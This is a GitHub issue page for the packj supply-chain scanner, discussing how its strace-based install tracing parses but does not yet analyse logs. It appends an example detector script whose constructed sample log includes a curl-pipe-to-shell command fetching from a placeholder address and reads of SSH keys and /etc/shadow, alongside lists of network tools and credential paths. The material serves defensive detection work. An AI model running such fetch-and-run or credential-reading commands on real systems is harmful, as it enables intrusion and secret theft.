ossillate-inc / packj

Packj stops Solarwinds-, ESLint-, and PyTorch-like attacks by flagging malicious/vulnerable open-source dependencies ("weak links") in your software supply-chain
https://packj.dev
GNU Affero General Public License v3.0

Analysis of the Tracing Log #87

Closed Co1lin closed 11 months ago

Co1lin commented 1 year ago

First, thanks for the amazing work!

I want to check my understanding of the current implementation of tracing. If we specify -t, the installation will be traced with strace -f -ttt -T -o strace.log <cmd>. Then the tracing log will be parsed by parse_trace_file. If the parsing succeeds, an OK message appears with a brief summary of syscalls.

To me, it seems that the tracing log is only "parsed", but not "analyzed". So if some suspicious activities are logged in the tracing log, it will still report an OK message. Then, a manual analysis of the tracing log is required to draw a conclusion on whether it is malicious or not. Is this correct?

BTW, the current version does not support tracing for local packages. I find it only requires a few lines of changes to support tracing local_nodejs:/path/to/pkg. Is there anyone working on this? I can propose a PR if needed.

ashishbijlani commented 11 months ago

Yes, your understanding is correct. More work is needed for analyzing parsed logs for suspicious activities. Feel free to submit a PR. Thanks!
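The gap both comments describe is the step between parsing and analysis: a parsed `strace -f -ttt -T` log still needs rules run over it before an OK verdict means anything. The script below is an added example written for this thread; it is not packj's parse_trace_file and not the project's code. It parses the line shape that strace produces under those flags (pid, epoch timestamp, call, return value, elapsed time), stitches the `<unfinished ...>` / `<... resumed>` pairs that -f splits across pids, skips exit and signal notices, and then runs three illustrative heuristics that are assumptions of this example only: an execve whose argv mentions a downloader such as curl or wget, a connect() to a non-loopback address, and an open()/openat() of a credential file. The log it runs on is constructed for the example.

```python
"""Parse an `strace -f -ttt -T -o file` log and flag suspicious syscalls.

Added example for this issue thread; not packj's parse_trace_file, and the
detection heuristics are illustrative assumptions, not the project's rules.
"""
import os
import re
from collections import Counter
from dataclasses import dataclass

# One completed syscall line:  <pid> <epoch.usec> <name>(<args>) = <ret> [ERRNO (text)] <elapsed>
SYSCALL_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ts>\d+\.\d+)\s+(?P<name>\w+)\((?P<args>.*)\)\s+=\s+"
    r"(?P<ret>\S+)(?P<err>.*?)\s*<(?P<elapsed>\d+\.\d+)>$"
)
# With -f a call pre-empted by another traced process is split into two lines:
#   <pid> <ts> connect(5, {...}, 16 <unfinished ...>
#   <pid> <ts> <... connect resumed>) = 0 <0.020100>
UNFINISHED_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<ts>\d+\.\d+)\s+(?P<name>\w+)\((?P<args>.*?)\s*<unfinished \.\.\.>$")
RESUMED_RE = re.compile(
    r"^(?P<pid>\d+)\s+\d+\.\d+\s+<\.\.\. (?P<name>\w+) resumed>\s*(?P<args>.*?)\)\s+=\s+"
    r"(?P<ret>\S+)(?P<err>.*?)\s*<(?P<elapsed>\d+\.\d+)>$"
)
# Process-exit ("+++ exited with 0 +++") and signal ("--- SIGCHLD ... ---") notices.
NOTICE_RE = re.compile(r"^\d+\s+\d+\.\d+\s+(\+\+\+|---)")

# Heuristics (assumptions of this example): downloaders in argv, credential paths, egress.
NETWORK_TOOLS = {"curl", "wget", "nc", "ncat"}
SENSITIVE_PATHS = ("/.ssh/", "/.aws/", "/.npmrc", "/.pypirc", "/.gnupg/", "/etc/shadow")
INET4_RE = re.compile(r'sin_port=htons\((\d+)\), sin_addr=inet_addr\("([^"]+)"\)')
INET6_RE = re.compile(r'sin6_port=htons\((\d+)\),.*?inet_pton\(AF_INET6, "([^"]+)"')


@dataclass
class Syscall:
    pid: int
    ts: float
    name: str
    args: str
    ret: str
    elapsed: float


@dataclass
class Finding:
    rule: str
    pid: int
    ts: float
    detail: str


def parse_trace(text: str) -> tuple[list[Syscall], list[str]]:
    """Return (syscalls, unparsed lines); unfinished/resumed halves are joined per (pid, name)."""
    calls: list[Syscall] = []
    unparsed: list[str] = []
    pending: dict[tuple[int, str], tuple[float, str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or NOTICE_RE.match(line):
            continue
        if m := UNFINISHED_RE.match(line):
            pending[(int(m["pid"]), m["name"])] = (float(m["ts"]), m["args"])
        elif m := RESUMED_RE.match(line):
            ts, head = pending.pop((int(m["pid"]), m["name"]), (0.0, ""))
            calls.append(Syscall(int(m["pid"]), ts, m["name"], head + m["args"], m["ret"], float(m["elapsed"])))
        elif m := SYSCALL_RE.match(line):
            calls.append(Syscall(int(m["pid"]), float(m["ts"]), m["name"], m["args"], m["ret"], float(m["elapsed"])))
        else:
            unparsed.append(line)  # surfaced, not silently dropped: a parser gap is itself a finding
    return calls, unparsed


def summarize(calls: list[Syscall]) -> Counter:
    """The 'brief summary of syscalls' a parse step can give on its own."""
    return Counter(c.name for c in calls)


def analyze(calls: list[Syscall]) -> list[Finding]:
    """Run the heuristics over parsed calls; a failed call (ret -1) still shows intent and is kept."""
    findings: list[Finding] = []
    for c in calls:
        if c.name == "execve":
            m = re.match(r'"([^"]+)"', c.args)
            prog = os.path.basename(m.group(1)) if m else ""
            if prog in NETWORK_TOOLS or any(re.search(rf"\b{t}\b", c.args) for t in NETWORK_TOOLS):
                findings.append(Finding("exec-tool", c.pid, c.ts, f"{prog}: {c.args[:80]}"))
        elif c.name == "connect":
            for rx in (INET4_RE, INET6_RE):
                if m := rx.search(c.args):
                    port, ip = m.group(1), m.group(2)
                    if not (ip.startswith("127.") or ip == "::1"):
                        findings.append(Finding("network-egress", c.pid, c.ts, f"{ip}:{port} ret={c.ret}"))
                    break
        elif c.name in ("open", "openat"):
            m = re.search(r'"([^"]+)"', c.args)
            if m and any(s in m.group(1) for s in SENSITIVE_PATHS):
                findings.append(Finding("credential-read", c.pid, c.ts, f"{m.group(1)} ret={c.ret}"))
    return findings


def verdict(findings: list[Finding]) -> str:
    return "OK" if not findings else f"SUSPICIOUS ({len(findings)} findings)"


# Constructed sample log in `strace -f -ttt -T -o` format (not a real capture).
SAMPLE_LOG = """\
4211 1700000000.100000 execve("/usr/bin/npm", ["npm", "install"], 0x7ffc3b10) = 0 <0.000912>
4211 1700000000.200000 openat(AT_FDCWD, "/tmp/pkg/package.json", O_RDONLY|O_CLOEXEC) = 3 <0.000031>
4211 1700000000.250000 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f1c) = 4212 <0.000210>
4212 1700000000.300000 execve("/bin/sh", ["sh", "-c", "curl -s http://203.0.113.7/p.sh | sh"], 0x55d0) = 0 <0.000400>
4212 1700000000.400000 openat(AT_FDCWD, "/home/dev/.ssh/id_rsa", O_RDONLY) = 4 <0.000019>
4212 1700000000.450000 openat(AT_FDCWD, "/etc/shadow", O_RDONLY) = -1 EACCES (Permission denied) <0.000012>
4212 1700000000.500000 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 5 <0.000025>
4212 1700000000.510000 connect(5, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("203.0.113.7")}, 16 <unfinished ...>
4211 1700000000.520000 wait4(-1,  <unfinished ...>
4212 1700000000.530000 <... connect resumed>) = 0 <0.020100>
4212 1700000000.600000 connect(6, {sa_family=AF_INET, sin_port=htons(5432), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused) <0.000040>
4212 1700000000.700000 +++ exited with 0 +++
4211 1700000000.710000 <... wait4 resumed>[{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 4212 <0.190000>
4211 1700000000.720000 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4212, si_uid=1000, si_status=0} ---
4211 1700000000.800000 +++ exited with 0 +++
"""

if __name__ == "__main__":
    calls, unparsed = parse_trace(SAMPLE_LOG)
    print("summary:", dict(summarize(calls)), "unparsed:", len(unparsed))
    found = analyze(calls)
    for f in found:
        print(f"{f.ts:.6f} pid={f.pid} {f.rule}: {f.detail}")
    print("verdict:", verdict(found))
```

Note the difference between summarize() and analyze(): on this log the summary is perfectly healthy (a handful of execve, openat, socket and connect calls), and only the heuristics turn the credential read and the outbound connect into findings. The resumed connect keeps the timestamp of its unfinished half, so findings still sort in wall-clock order across pids. Real installs legitimately spawn `sh -c` for lifecycle scripts and talk to the registry, so a deployable version of these rules would need an allowlist of expected hosts and build tools.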